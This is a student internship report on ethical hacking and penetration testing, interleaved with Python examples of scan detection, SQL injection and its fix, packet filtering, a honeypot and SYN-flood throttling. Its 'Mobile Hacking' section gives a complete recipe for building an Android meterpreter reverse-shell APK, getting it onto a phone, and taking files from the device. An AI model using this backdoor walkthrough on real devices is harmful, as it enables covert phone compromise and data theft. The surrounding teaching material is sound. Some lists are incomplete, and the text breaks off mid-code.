Department of Computer Science Engineering Centurion University of Technology and Management VISAKHAPATNAM-530045 2020-21
Declaration
I, B. Akshay Kumar, student of VIII Semester B.Tech in the Department of Computer Science
Engineering, Centurion University of Technology and Management (CUTMAP),
declare that the internship entitled (Vulnerability Assessment & Penetration Testing and Web
Application Penetration Testing) has been carried out by me in Star Computers Visakhapatnam during
15th May, 2019 to 15th June, 2019. This report is being submitted for the fulfillment of my internship and
for record purposes.
Place: Signature
Date: ___________
ACKNOWLEDGEMENTS
With great solemnity and sincerity, I offer my profuse thanks to CUTM management for
providing all the resources to complete our internship successfully.
I am extremely grateful to my technical specialist Mr. Anand Kethavarapu, and I wish to
express my wholehearted gratitude to my internship guide.
I owe a particular debt of gratitude to Prof. A. Avinash, Head of the Department of Computer Science
Engineering, for providing all facilities required for the internship.
I thank Prof. Dr. P.S.V. Ramana Rao, Dean, CUTMAP, for extending his utmost support and
cooperation in providing all the provisions for the successful completion of the project.
Regards,
B. Akshay Kumar
COMPANY INTRODUCTION:
Highlights
Teaching by faculty with 20 years of technical and industry experience.
This class immerses the student in an interactive environment where they are shown
how to scan, test, hack and secure their own systems. The lab-intensive environment gives each
student in-depth knowledge and practical experience with the current essential security systems.
Students begin by understanding how perimeter defenses work and are then led into
scanning and attacking their own networks; no real network is harmed. Students then learn how
intruders escalate privileges and what steps can be taken to secure a system. Students also
learn about intrusion detection, policy creation, social engineering, DDoS attacks, buffer
overflows and virus creation. When a student leaves this intensive 30-day class, they will have
hands-on understanding and experience in ethical hacking.
Abstract
1. INTRODUCTION:
Cyber security is the process of protecting and recovering networks, devices and programs
from any type of cyber-attack, and from the disruption or misdirection that an attacker causes.
It is the body of technologies that guard against modification or unauthorized access. It is
also referred to as Information Security.
2. SCANNING NETWORKS:
Network scanning is the procedure of identifying active hosts, ports and the services used by
the target application. Suppose you are an ethical hacker and want to find vulnerabilities in
a system: you need a point in the system that you can try to attack. Network scanning for
ethical hacking is used to find the points in the system that a black-hat hacker could use
to hack the network, and the respective teams then work on improving the security of the
network. Every organization has a network. This network could be an internal network
consisting of all the systems connected with each other, or it can be a network that is
connected to the internet. In either case, to hack the network, you will have to find a
vulnerable point in the network that can be exploited. Network scanning is used to find
such points in the network.
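The scanning described above leaves a characteristic trace on the defending side: one source touching many distinct ports of a host in a short time, most of them dropped by the firewall. The following Python is an added example, not part of the original report, that parses constructed firewall log lines (the log format, addresses and thresholds are assumptions for the demo) and flags such sources with a sliding-window count of distinct destination ports.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime

# Constructed sample firewall log lines (not from the report).
# Format assumed for this demo: "<ISO time> <src ip> <dst ip>:<dst port> <ACCEPT|DROP>"
SAMPLE_LOG = """\
2021-03-01T10:00:01 10.0.0.7 192.168.1.20:22 DROP
2021-03-01T10:00:01 10.0.0.7 192.168.1.20:23 DROP
2021-03-01T10:00:02 10.0.0.7 192.168.1.20:80 ACCEPT
2021-03-01T10:00:02 10.0.0.7 192.168.1.20:443 ACCEPT
2021-03-01T10:00:03 10.0.0.7 192.168.1.20:3306 DROP
2021-03-01T10:00:03 10.0.0.7 192.168.1.20:8080 DROP
2021-03-01T10:00:04 10.0.0.7 192.168.1.20:445 DROP
2021-03-01T10:00:05 10.0.0.7 192.168.1.20:139 DROP
2021-03-01T10:00:06 10.0.0.7 192.168.1.20:21 DROP
2021-03-01T10:00:07 10.0.0.7 192.168.1.20:25 DROP
2021-03-01T10:00:08 10.0.0.7 192.168.1.20:110 DROP
2021-03-01T10:00:10 10.0.0.7 192.168.1.20:3389 DROP
2021-03-01T10:05:00 10.0.0.9 192.168.1.20:443 ACCEPT
2021-03-01T10:05:30 10.0.0.9 192.168.1.20:443 ACCEPT
2021-03-01T10:06:00 10.0.0.9 192.168.1.20:80 ACCEPT
"""


@dataclass(frozen=True)
class LogEntry:
    time: datetime
    src: str
    dst: str
    port: int
    action: str


def parse_log(text):
    """Parse the constructed log format into LogEntry records."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst_port, action = line.split()
        dst, port = dst_port.rsplit(":", 1)
        entries.append(LogEntry(datetime.fromisoformat(ts), src, dst, int(port), action))
    return entries


def detect_scanners(entries, window_seconds=60, port_threshold=10):
    """Flag sources that touch >= port_threshold distinct (dst, port) pairs inside
    any sliding window of window_seconds. Returns {src: {"distinct_ports": n,
    "drops": d}} for flagged sources only."""
    by_src = defaultdict(list)
    for e in entries:
        by_src[e.src].append(e)

    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.time)
        in_window = Counter()   # (dst, port) -> hits currently inside the window
        left = 0
        peak = 0
        for e in evs:
            in_window[(e.dst, e.port)] += 1
            # Slide the left edge forward until the window is at most window_seconds wide
            while (e.time - evs[left].time).total_seconds() > window_seconds:
                old = (evs[left].dst, evs[left].port)
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= port_threshold:
            drops = sum(1 for e in evs if e.action == "DROP")
            alerts[src] = {"distinct_ports": peak, "drops": drops}
    return alerts


if __name__ == "__main__":
    for src, info in detect_scanners(parse_log(SAMPLE_LOG)).items():
        print(f"possible scan from {src}: {info}")
```

The high proportion of DROP entries is the second signal worth keeping beside the port count: a legitimate client rarely hits ten closed ports in a row.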
3. SYSTEM HACKING:
System hacking is defined as the compromise of computer systems and software to access the
target computer and steal or misuse its sensitive information. Here the malicious hacker
exploits weaknesses in a computer system or network to gain unauthorized access to its
data or take illegal advantage of it.
A hacker can hack a computer system because the hacker knows how computer systems
and the software inside them actually work. For this, the hacker has knowledge of
systems, networking and other areas related to computer science. Anyone
who uses a computer connected to the internet is susceptible to malicious hackers'
threats. These online villains generally use viruses, malware, Trojans, worms, phishing
techniques, email spamming and social engineering, or exploit operating system and
port vulnerabilities, to access a victim's system.
Some worms spread as network packets; these directly penetrate the computer memory, and
the worm code is then activated. Worms use the following techniques to penetrate remote
computers and launch copies of themselves: social engineering (for example, an email
message suggesting the user opens an attached file), exploiting network configuration errors
(such as copying to a fully accessible disk), and exploiting loopholes in operating system and
application security.
Viruses can be divided in accordance with the method used to infect a computer:
File viruses
Boot sector viruses
Macro viruses
Script viruses
Any program within this subclass can have additional Trojan functions. It should also be
noted that many worms use more than one method in order to spread copies via networks.
The rules for classifying detected objects with multiple functions should be used to classify
these types of worms.
This subclass of malicious programs includes the following behaviours:
Email-Worm
IM-Worm
IRC-Worm
Net-Worm
P2P-Worm
Virus
Worm
5. SOCIAL ENGINEERING:
Social engineering is the act of tricking someone into divulging information or taking action,
usually through technology. The idea behind social engineering is to take advantage of a
potential victim’s natural tendencies and emotional reactions.
TYPES:
Phishing
Spear phishing
Vishing
Pretexting
Baiting
5.1. PHISHING:
Phishing is used to steal user data including login credentials and credit card numbers. It
occurs when an attacker poses as a trusted entity.
FIG: 5.1 to FIG: 5.5 (figures not reproduced)
6. HACKING WEBSERVERS:
A web server is a program that stores files (usually web pages) and makes them accessible
via the network or the internet. A web server requires both hardware and software. Attackers
usually target exploits in the software to gain unauthorized entry to the server. Let's look at
some of the common vulnerabilities that attackers take advantage of.
Default settings - Settings such as default user ids and passwords can easily be
guessed by attackers. Default settings might also allow performing certain tasks,
such as running commands on the server, which can be exploited.
Misconfiguration of operating systems and networks - Certain configurations, such
as allowing users to execute commands on the server, can be dangerous if the user
does not have a good password.
Bugs in the operating system and web servers - Discovered bugs in the operating
system or web server software can also be exploited to gain unauthorized access to the
system.
7. SQL INJECTION:
SQL injection is a set of SQL commands placed in a URL string or in data structures
in order to retrieve a response that the attacker wants from the databases connected to the
web application. This type of attack generally takes place on web pages developed using
PHP or ASP.NET.
An SQL injection attack can be done with the following intentions:
To dump the whole database of a system,
To modify the content of the databases, or
To perform different queries that are not allowed by the application.
This type of attack works when the application does not validate its inputs properly before
passing them to an SQL statement. Injections are normally placed in address bars, search
fields, or data fields.
The easiest way to detect whether a web application is vulnerable to an SQL injection attack is to
use the " ' " character in a string and see if you get any error.
FIG: 7.1
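To make the point concrete, here is an added Python example (not code from the report) showing the defect beside its fix: a login query built by string concatenation, a parameterized version, the single-quote probe the text describes, and the textbook comment-out input run through both so the difference is visible. It uses an in-memory SQLite database; the table, user names and passwords are constructed demo values.

```python
import sqlite3


def make_demo_db():
    """In-memory database with constructed sample users (demo data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn, username, password):
    """The defect: user input is pasted straight into the SQL text, so the input
    can change the structure of the query instead of only its values."""
    query = ("SELECT username, role FROM users "
             "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Parameterized query: the driver sends values separately from the SQL text,
    so a quote in the input is only ever data."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()


def quote_probe(conn, login):
    """The report's quick check: submit a lone ' and see whether the database complains.
    Returns the error text (a sign of vulnerability) or None when the input is handled."""
    try:
        login(conn, "'", "anything")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def compare(conn):
    """Run the same inputs through both versions and report what each returns."""
    tampered_user = "alice' --"   # textbook comment-out input, used only to show the contrast
    return {
        "probe_vulnerable": quote_probe(conn, login_vulnerable),
        "probe_safe": quote_probe(conn, login_safe),
        "bypass_vulnerable": login_vulnerable(conn, tampered_user, "wrong"),
        "bypass_safe": login_safe(conn, tampered_user, "wrong"),
        "normal_safe": login_safe(conn, "bob", "hunter2"),
    }


if __name__ == "__main__":
    for name, result in compare(make_demo_db()).items():
        print(f"{name}: {result!r}")
```

The probe on the concatenated query raises a syntax error, which is exactly the symptom the text tells the tester to look for; the same probe against the parameterized query is just a failed login. Note that the quote check is a detection heuristic only: an application that swallows database errors can still be injectable.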
8. FIREWALLS:
Firewalls can be either software based or hardware devices that are used in the enforcement
of security policies. Both can filter traffic based on a set of rules as traffic passes through
them. Routers are not firewalls and should never be considered as such. Network based
firewalls will route traffic, but only if the policy allows. Single hosts can be protected
from both incoming and outgoing traffic by use of a host based firewall. Regardless of
whether the firewall is software or hardware, all can create a troubleshooting nightmare
should they not be configured carefully or correctly. This is the keystone of a business
objective driven policy when it comes to firewall configuration.
Improvised configurations do not work well with firewalls. The configuration must be
carefully thought through and any impact caused by the configuration must be considered.
This should be done before the implementation of any firewall policies. Physical or social
engineering attacks cannot be protected against by any firewall. The most common
weaknesses in any firewall are leaving it in its default configuration or
careless implementation. Attackers are looking hard for these weaknesses and the best
defensive measure is to prevent them from finding any by changing the default settings and
by careful firewall configuration. Of equal importance is to understand both the benefits and
the limitations of firewalls and to avoid being lulled into a false sense of security by
thinking their mere presence is equal to network security and protection.
Firewall Classes
Different types of firewalls exist each having their own niche in the market. Some products
are multi-functional providing features such as routing and Demilitarized Zones (DMZ).
These are the four common firewall classes:
Packet Filters
Circuit Level Gateways
Application Level Firewalls
Stateful Multilayer Inspection Firewalls
Packet Filters - Packet filters search for protocol information in the delivery and transport
layers. The idea behind this is to filter out the obvious items first. Since every packet is a
discrete single logical unit, packet filters only look at one delivery at a time. This method is
computationally cheap and very efficient.
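An added Python example (not from the report) of the packet-filter class just described: a stateless, first-match rule list judged purely on protocol, addresses and port, one packet at a time. The rule set and packets are constructed for the demo. What it shows is the default-configuration weakness raised above: a packet that no rule mentions is decided entirely by the default action, so a default-allow filter quietly passes anything the administrator forgot to write a rule for.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Packet:
    proto: str      # "tcp", "udp" or "icmp"
    src: str
    dst: str
    dport: int      # 0 when the protocol has no port


@dataclass(frozen=True)
class Rule:
    action: str                     # "allow" or "deny"
    proto: str = "any"
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    dport: Optional[int] = None     # None matches any port

    def matches(self, pkt: Packet) -> bool:
        # Header fields only: a packet filter never looks at payload or connection state
        return ((self.proto == "any" or self.proto == pkt.proto)
                and ip_address(pkt.src) in ip_network(self.src)
                and ip_address(pkt.dst) in ip_network(self.dst)
                and (self.dport is None or self.dport == pkt.dport))


class PacketFilter:
    """Stateless first-match filter: each packet is judged on its own headers."""

    def __init__(self, rules, default_action):
        self.rules = list(rules)
        self.default_action = default_action

    def decide(self, pkt):
        """Return (action, index of the matching rule) or (default, None)."""
        for index, rule in enumerate(self.rules):
            if rule.matches(pkt):
                return rule.action, index
        return self.default_action, None   # nothing matched: the default decides


# Constructed rule set and traffic for a single web server (demo values only)
RULES = [
    Rule("allow", proto="tcp", dst="192.168.1.20/32", dport=80),
    Rule("allow", proto="tcp", dst="192.168.1.20/32", dport=443),
    Rule("deny", proto="tcp", dst="192.168.1.0/24", dport=23),
]
PACKETS = {
    "http": Packet("tcp", "203.0.113.5", "192.168.1.20", 80),
    "telnet": Packet("tcp", "203.0.113.5", "192.168.1.20", 23),
    "ssh": Packet("tcp", "203.0.113.5", "192.168.1.20", 22),   # nobody wrote a rule for this
    "ping": Packet("icmp", "203.0.113.5", "192.168.1.20", 0),
}


def evaluate(default_action):
    """Decisions for every sample packet under the given default policy."""
    fw = PacketFilter(RULES, default_action)
    return {name: fw.decide(pkt) for name, pkt in PACKETS.items()}


if __name__ == "__main__":
    for policy in ("deny", "allow"):
        print(f"default {policy}: {evaluate(policy)}")
```

Under default deny, the SSH and ICMP packets are rejected because no rule speaks for them; under default allow, the identical rule list lets both through, which is why the text insists on changing default settings before trusting the device.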
Circuit Level Gateways - Circuit level gateways are a unique set of firewalls that protect
the integrity of each end of the session, all without invading the confidentiality of the data that
is being exchanged. It is a socket level proxy, as it creates entirely new connections that are
based on the synchronizing of IP addresses and ports.
This method works by including a new translation of the sequence numbers that are tracked
by TCP to help the receiving host reassemble all of the segments of data. It also prevents
session hijacking and helps obscure the true endpoints of any observed conversation.
Application Level Firewalls - Application level firewalls work at Layer 7 by
looking at the content of each network packet. This includes all client-server requests and
information content that is delivered on the network. Application level firewalls are
computationally expensive, as many factors ride far beyond a simple string pattern that must
be matched and incorporated. Factors also include context and policies such as user profiles
and time-of-day constraints. Once a policy violation is detected, there is a consideration as to
whether or not to log the evidence in a forensically sound manner, to redirect the user to another
source, or to log the alert allowing manual intervention in determining what action
should be taken.
Honeypots
The Nature of Honeypots
Honeypots are designed to attract attackers with the idea that monitoring systems will allow
the attacker to be observed. Honeypots come in different scales: a honeypot is a host,
a honeynet is a network, and a honeytoken is a piece of monitored data. Before the
deployment of a honeypot, a company or organization needs to verify that it is not
violating the privacy rights of the attacker. Covert honeypots deployed by third party
projects fall into a different category.
The art of setting up a decoy victim is to make it appear legitimate. It must not stand out or
seem in any way unusual, or the attacker will notice and avoid it. Even so, honeypots are not
necessarily entirely exposed to risk, whereas a bastion host is, by definition, completely exposed
and therefore completely hardened because it is getting no help. A honeypot must not
create additional risk, or it could, and would, be used against its owner's network.
Honeypot Types
There are four different honeypot varieties that exist, all a matter of choice and a balance of
risk, accuracy and administrative distraction from the production hosts. These levels are:
Physical Honeypots
Virtual Honeypots
Low Interaction
High Interaction
Physical Honeypots - These are considered physical tests, fully functional and heavily
monitored. They can be as simple as an unlocked bicycle leaning against a wall. Though it is
there and unsecured, this does not mean the owner has given anyone permission to
take it.
Virtual Honeypots - This type is a sacrificial host set up on a network, having real services
running on a real OS but containing only fictional information, if any at all. Though this
honeypot comes with great risk, it is the most convincing form of honeypot. This type of
honeypot will appear as rogue infrastructure and cause internal time wasting should it not
be formalized in configuration and release, and without change management processes in place.
The IDS may have been told to pass all traffic coming from the honeypot, and this can be a
big mistake should the honeypot be compromised while remaining undetected. In this state, it
could be used as a weapon against the network.
Low Interaction - This form appears to an attacker as an access point. It only logs probing
activity, however, and since this host is of no production value, all access attempts are
considered suspicious.
High Interaction - This form can be of great risk. Being able to be fully compromised, it
must be separated from any network segment that has production value. The monitoring
capabilities of this type of honeypot facilitate the gathering of information that would not be
noticed by a NIDS. By diligently monitoring the honeypot, detection of the attacker's larger plan
is possible, and if the attacker manages to evade the network-based intrusion
detection, hopefully the diversion will be discovered while it is being attacked.
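As an added example (not code from the report), the following Python implements a minimal low-interaction honeypot of the kind described under Low Interaction: it listens on a loopback port chosen by the OS, sends a fake service banner, records the first bytes of whatever the visitor sends together with source address and time, and closes. Because the host has no production value, every record is tagged suspicious. The banner text, the fake host name and the two probe payloads are constructed demo values.

```python
import socket
import socketserver
import threading
import time
from datetime import datetime, timezone

# Constructed fake service banner: the honeypot pretends to be a mail server (demo value)
BANNER = b"220 mail.example.test ESMTP ready\r\n"


class ProbeLog:
    """Thread-safe list of what the honeypot saw."""

    def __init__(self):
        self.entries = []
        self._lock = threading.Lock()

    def add(self, entry):
        with self._lock:
            self.entries.append(entry)


class ProbeHandler(socketserver.BaseRequestHandler):
    """Send a banner, read whatever the visitor sends first, record it, hang up.
    The honeypot never does anything else, so there is nothing for a visitor to compromise."""

    def handle(self):
        self.request.settimeout(2.0)
        self.request.sendall(BANNER)
        try:
            first = self.request.recv(1024)
        except socket.timeout:
            first = b""
        self.server.log.add({
            "time": datetime.now(timezone.utc).isoformat(),
            "src": self.client_address[0],
            "src_port": self.client_address[1],
            "first_bytes": first[:64],
            "verdict": "suspicious",    # no production value here, so every contact is suspect
        })


class Honeypot(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, log):
        super().__init__(("127.0.0.1", 0), ProbeHandler)   # port 0: let the OS pick a free port
        self.log = log


def start_honeypot():
    """Start the listener in a background thread; return (server, port, log)."""
    log = ProbeLog()
    server = Honeypot(log)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1], log


def probe(port, payload):
    """Stand-in for a scanner touching the port: read the banner, send one line, disconnect."""
    with socket.create_connection(("127.0.0.1", port), timeout=2.0) as s:
        banner = s.recv(1024)
        s.sendall(payload)
    return banner


def wait_for_entries(log, count, timeout=3.0):
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if len(log.entries) >= count:
            return True
        time.sleep(0.05)
    return len(log.entries) >= count


def run_demo():
    """Start the honeypot, hit it twice, return the banner seen and the recorded probes."""
    server, port, log = start_honeypot()
    try:
        banner = probe(port, b"EHLO scanner.example\r\n")
        probe(port, b"GET / HTTP/1.0\r\n\r\n")
        wait_for_entries(log, 2)
    finally:
        server.shutdown()
        server.server_close()
    return banner, list(log.entries)


if __name__ == "__main__":
    banner, entries = run_demo()
    print(banner)
    for entry in entries:
        print(entry)
```

In a real deployment the log would go to the NIDS or SIEM rather than a Python list, and the honeypot would sit on its own segment with no route to production hosts, as the High Interaction paragraph requires.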
9. CRYPTOGRAPHY:
Cryptography techniques
Cryptography is closely related to the disciplines of cryptology and cryptanalysis. It includes
techniques such as microdots, merging words with images, and other ways to hide
information in storage or transit. However, in today's computer-centric world, cryptography
is most often associated with scrambling plaintext (ordinary text, sometimes referred to as
clear text) into cipher text (a process called encryption), then back again (known as
decryption). Individuals who practice this field are known as cryptographers.
4. Authentication: the sender and receiver can confirm each other's identity and the
origin/destination of the information
10. MOBILE HACKING:
1. Prepare Kali:
a) /etc/apache2/apache2.conf # add ServerName localhost
b) service postgresql start
c) service metasploit start
2. Generate the payload APK:
# msfpayload android/meterpreter/reverse_tcp lhost=<kali ip> O R > /root/Desktop/backdoor.apk # backdoor.apk is generated
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.201 LPORT=4444 R > /root/Desktop/backdoor.apk
3. Sending backdoor.apk to the Android mobile:
a) service apache2 start
b) cd /var/www
c) mkdir html
d) cp backdoor.apk /var/www/html
e) On the Android device, launch the browser, go to www.<kali-ip>/html and download
4. On Kali launch:
# msfconsole
msf> use exploit/multi/handler
handler> set payload android/meterpreter/reverse_tcp
handler> set LHOST <ip>
handler> show options
handler> exploit -j z
5. On the Android phone execute the backdoor.apk program
6. On Kali, session 1 is opened:
handler> session -i 1
meterpreter> sysinfo
meterpreter> ipconfig
meterpreter> pwd
meterpreter> ls
meterpreter> cd /sdcard
Create a test directory and transfer files using
meterpreter> upload <filename>
meterpreter> download <filename>
11. FOOTPRINTING:
Footprinting refers to the process of collecting as much information as possible about the target system
to find ways to penetrate the system. An ethical hacker has to spend the majority of his
time profiling an organization, gathering information about the hosts, network and people
related to the organization.
Information such as IP addresses, WHOIS records, DNS information, the operating system used,
employee email ids, phone numbers etc. is collected.
Footprinting helps to:
Know the security posture - The data gathered will help us get an overview of the security
posture of the company, such as details about the presence of a firewall, security
configurations of applications etc.
Reduce the attack area - We can identify a specific range of systems and concentrate on particular
targets only. This will greatly reduce the number of systems we are focusing on.
Draw a network map - Helps to draw a network map of the networks in the target
organization covering topology, trusted routers, presence of servers and other information.
Information gathering and getting to know the target systems is the first process in ethical
hacking. Reconnaissance is a set of processes and techniques (footprinting, scanning and
enumeration) used to covertly discover and collect information about a target system.
RECONNAISSANCE:
Active Reconnaissance
In this process, you directly interact with the computer system to gain information. This
information can be relevant and accurate, but there is a risk of being detected if you
carry out active reconnaissance without permission. If you are detected, the system admin
can take severe action against you and track your subsequent activities.
Passive Reconnaissance
In this process, you are not directly connected to the computer system. This process is used
to gather essential information without ever interacting with the target systems.
12. ENUMERATION:
Enumeration is defined as the process of extracting user names, machine names, network
resources, shares and services from a system. In this phase, the attacker creates an active
connection to the system and performs directed queries to gain more information about the
target. The gathered information is used to identify vulnerabilities or weak points in
system security, which are then exploited in the system gaining phase. Information enumerated includes:
Routing tables
Machine names
13. TROJANS:
A Trojan package is built from the following parts:
1. Dropper: This is the code which installs the malicious code onto the target.
2. Malicious code: This is the code which exploits the system and gives the attacker
control over the target.
3. Wrapper: The wrapper wraps the dropper, malicious code and genuine code into one exe
package. When victims try to download an infected file, the dropper installs the malicious code
first and then the genuine program.
Purpose of Trojans
Steal information such as passwords, security codes and credit card information using
keyloggers
Use the victim's PC as part of a botnet to perform DoS, spamming and blasting of email messages
Hypervisor Trojan
HTTP/HTTPS Trojan
FTP Trojans
VNC Trojans
Banking Trojans
Destructive Trojan
Botnet Trojan
Proxy Trojan
Countermeasures:
Always upgrade and keep firewalls, IDS and anti-virus updated with the latest patches
and signatures
Periodically check startup programs and running processes to find any malicious files
running.
BACKDOOR:
14. SNIFFERS:
Sniffing is the process of monitoring and capturing all data packets passing through a given
network. Sniffers are used by network/system administrators to monitor and troubleshoot
network traffic. Attackers use sniffers to capture data packets containing sensitive
information such as passwords, account information etc. Sniffers can be hardware or software
installed in the system. By placing a packet sniffer on a network in promiscuous mode, a
malicious intruder can capture and analyze all of the network traffic.
Active Sniffing:
Sniffing on a switch is active sniffing. A switch is a point-to-point network device. The
switch regulates the flow of data between its ports by actively monitoring the MAC address
on each port, which lets it pass data only to its intended target. In order to capture the traffic
between targets, the sniffer has to actively inject traffic into the LAN to enable sniffing of the
traffic. This can be done in various ways.
Passive Sniffing:
This is the process of sniffing through a hub. Any traffic that is passing through a non-
switched or unbridged network segment can be seen by all machines on that segment.
Sniffers operate at the data link layer of the network. Any data sent across the LAN is
actually sent to each and every machine connected to the LAN. This is called passive since
the sniffers placed by the attacker passively wait for the data to be sent and capture it.
15. DENIAL OF SERVICE:
A denial of service (DoS) attack is an attack against a computer or network which reduces,
restricts or prevents accessibility of its system resources to authorized users.
A distributed denial of service (DDoS) attack is an attack where multiple compromised
systems simultaneously attack a single system, thereby causing a DoS condition for the users of
the target.
An attacker can select the zombies randomly or topologically and, once they are compromised, sets
up a command and control server to control the zombies that attack the target. A bot is
malicious software installed on compromised machines; this gives the attacker control over
the zombies. The network of bots is called a botnet.
Fig: 15.1
Types of DoS:
Volumetric attacks:
This is an attack where the entire bandwidth of a network is consumed so that authorized
clients are not able to get the resources. This is achieved by flooding the network devices,
such as hubs or switches, with numerous ICMP echo request/reply packets so that the entire
bandwidth is consumed and no other clients are able to connect to the target network.
SYN flooding:
This is another attack where an attacker compromises multiple zombies and simultaneously floods
the target with multiple SYN packets. The target will be overwhelmed by the SYN requests;
either it goes down or its performance is reduced drastically.
Fig: 15.2
Fragmentation attacks:
This is an attack that fights against the reassembly ability of the target. Numerous
fragmented packets are sent to the target, making it difficult for the target to reassemble them,
thereby denying access to valid clients.
TCP state exhaustion attacks:
The attacker sets up and tears down TCP connections and overwhelms the state tables,
thereby causing a DoS attack.
Application layer attacks:
The attacker takes advantage of programming errors in the application to cause the denial
of service attack. It is achieved by sending numerous application requests to the target to
exhaust the target's resources so that it is not able to service any valid clients. A
programming error in the case of a buffer overflow attack: if the memory allocated to a
variable is smaller than what is requested, it may lead to memory leakage or crash the
entire application.
Fig: 15.3
Phlashing:
This is done by causing permanent damage to the system hardware by sending fraudulent
updates to the hardware, thereby making it completely unusable. The only solution is to
re-install the hardware.
Countermeasures:
Perform proper activity profiling and ingress/egress filtering to filter out unwanted
traffic.
Add additional load balancers to absorb traffic and set up throttle logic to control
traffic.
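An added Python example, not code from the report, covering the SYN flooding attack above and the throttle logic listed under countermeasures: it counts half-open connections per source (a SYN never followed by an ACK from the same source port) over constructed traffic, raises an alert above a threshold, and applies a per-source token bucket to show how a throttle drops most of the flood while a client completing normal handshakes is untouched. Addresses, timings, the rate and the burst size are demo assumptions.

```python
from collections import Counter


def build_sample_traffic():
    """Constructed packets arriving at one server port: (time_ms, src, sport, flags)."""
    packets = []
    # One legitimate client completing three handshakes (SYN, then ACK from the same port)
    for i, t in enumerate((100, 200, 300)):
        packets.append((t, "10.0.0.5", 50000 + i, "SYN"))
        packets.append((t + 5, "10.0.0.5", 50000 + i, "ACK"))
    # One zombie sending 50 SYNs in half a second from rotating source ports, never finishing
    for k in range(50):
        packets.append((k * 10, "203.0.113.10", 40000 + k, "SYN"))
    packets.sort()
    return packets


def half_open_by_source(packets):
    """Number of (src, sport) handshakes that saw a SYN but no completing ACK."""
    pending = {}
    for ts, src, sport, flags in packets:
        key = (src, sport)
        if flags == "SYN":
            pending[key] = ts
        elif flags == "ACK":
            pending.pop(key, None)
    return Counter(src for src, _ in pending)


def syn_flood_alerts(packets, threshold=20):
    """Sources whose half-open count reaches the threshold (activity profiling step)."""
    counts = half_open_by_source(packets)
    return {src: n for src, n in counts.items() if n >= threshold}


class TokenBucket:
    """Integer token bucket kept in milli-tokens to avoid floating-point drift:
    rate_per_s tokens are added per second, up to burst tokens."""

    def __init__(self, rate_per_s, burst):
        self.rate = rate_per_s          # tokens per second == milli-tokens per millisecond
        self.capacity = burst * 1000
        self.tokens = self.capacity
        self.last_ms = None

    def allow(self, now_ms):
        if self.last_ms is not None:
            self.tokens = min(self.capacity, self.tokens + self.rate * (now_ms - self.last_ms))
        self.last_ms = now_ms
        if self.tokens >= 1000:
            self.tokens -= 1000
            return True
        return False


def throttle_syns(packets, rate_per_s=5, burst=10):
    """Throttle logic: each source gets its own bucket; SYNs over budget are dropped.
    Returns a Counter of dropped SYNs per source."""
    buckets = {}
    dropped = Counter()
    for ts, src, sport, flags in packets:
        if flags != "SYN":
            continue
        bucket = buckets.setdefault(src, TokenBucket(rate_per_s, burst))
        if not bucket.allow(ts):
            dropped[src] += 1
    return dropped


if __name__ == "__main__":
    traffic = build_sample_traffic()
    print("half-open alerts:", syn_flood_alerts(traffic))
    print("dropped SYNs:", dict(throttle_syns(traffic)))
```

With a burst of 10 and a refill of 5 per second the zombie gets 12 of its 50 SYNs through in the half-second window and the other 38 are dropped, while the legitimate client loses nothing. A per-source bucket is of limited help against a distributed flood where each zombie stays under the rate, which is why the text pairs throttling with upstream filtering and load balancing.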
16. WEB APPLICATION ATTACKS:
A web application provides an interface for the web server and the client to communicate.
Web pages are generated at the server, and browsers present them at the client side. The data
is passed between client and server in the form of HTML pages over the HTTP protocol.
There are client-side vulnerabilities and server-side vulnerabilities which lead to web
application attacks.
Attacks:
Parameter Tampering:
This involves modifying parameters exchanged between client and server, which may lead to
XSS attack and SQL injection attack. Usually, HTML data goes as a name-value pair; if the
attacker is able to modify the values of the parameter during transfer, it may lead to many
other attacks.
Fig: 16.1
Unvalidated inputs:
Web applications accept user inputs, and queries are constructed based on dynamic user input. If
these inputs are not properly sanitized they open a way for the attacker to launch attacks
like XSS, SQL injection, directory traversal, etc.; identity theft and data theft are
dangerous outcomes of this attack.
Directory Traversal:
This is a type of vulnerability where an attacker is able to access beyond the web root
directory, into restricted directories on the web server. An attacker will then be able to
access system files, run OS commands, access configuration information, etc.
Fig: 16.2
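One way a web server avoids the traversal just described, shown as an added Python example rather than code from the report: decode the requested path, resolve it against the web root, and refuse anything whose resolved location is not beneath the root. The directory layout, file names and request strings are constructed for the demo; a symlink planted inside the root is included because resolve() follows it, which is the behaviour you want.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


def resolve_request(web_root, url_path):
    """Map a URL path onto the filesystem and refuse anything that escapes web_root.
    Returns ("ok", path relative to the root) or ("denied", reason)."""
    root = Path(web_root).resolve()
    decoded = unquote(url_path)                    # "%2e%2e" must be decoded before checking
    if "\x00" in decoded:
        return "denied", "null byte in path"
    # resolve() collapses every ".." and follows symlinks, so the containment check
    # below is made on the real location, not on the string the client sent
    candidate = (root / decoded.lstrip("/")).resolve()
    try:
        relative = candidate.relative_to(root)
    except ValueError:
        return "denied", "path escapes web root"
    return "ok", relative.as_posix()


def build_demo_root():
    """Constructed layout: a web root with two pages, and a secret file beside it."""
    base = Path(tempfile.mkdtemp(prefix="traversal-demo-"))
    root = base / "www"
    (root / "docs").mkdir(parents=True)
    (root / "index.html").write_text("<h1>hello</h1>")
    (root / "docs" / "guide.html").write_text("<p>guide</p>")
    (base / "secret.txt").write_text("not for the web")
    try:
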